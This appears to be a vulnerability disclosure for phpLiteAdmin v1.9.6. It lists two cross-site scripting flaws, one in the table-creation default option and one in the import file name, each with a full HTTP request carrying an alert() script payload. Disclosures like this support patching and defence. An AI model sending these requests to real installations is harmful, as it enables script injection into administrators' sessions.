phpLiteAdmin v1.9.6 – Multiple Vulnerabilities
phpLiteAdmin is a web-based SQLite database admin tool written in PHP with support for SQLite3 and SQLite2. XSS1: URL: http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 METHOD: Post PARAMETER: 0_defaultoption PAYLOAD: "><script>alert(1)</script> Request: POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1 tablename=testtable&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined"><script>alert(1)</script>&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test XSS2: URL: http://localhost/phpliteadmin/phpliteadmin.php?view=import METHOD: Post PARAMETER: file PAYLOAD: "><script>alert(2)</script> Request: POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------1675024292505 Content-Length: 1124 -----------------------------1675024292505 Content-Disposition: form-data; name="import_type" sql -----------------------------1675024292505 Content-Disposition: form-data; name="single_table" testtable -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_fieldsterminated" ; -----------------------------1675 024292505 Content-Disposition: form-data; name="import_csv_enclosed" " -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_escaped" -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_newline" auto -----------------------------1675024292505 Content-Disposition: form-data; name="import_csv_replace" on -----------------------------1675024292505 Content-Disposition: form-data; name="file"; filename=""><script>alert(2)</script> -----------------------------1675024292505--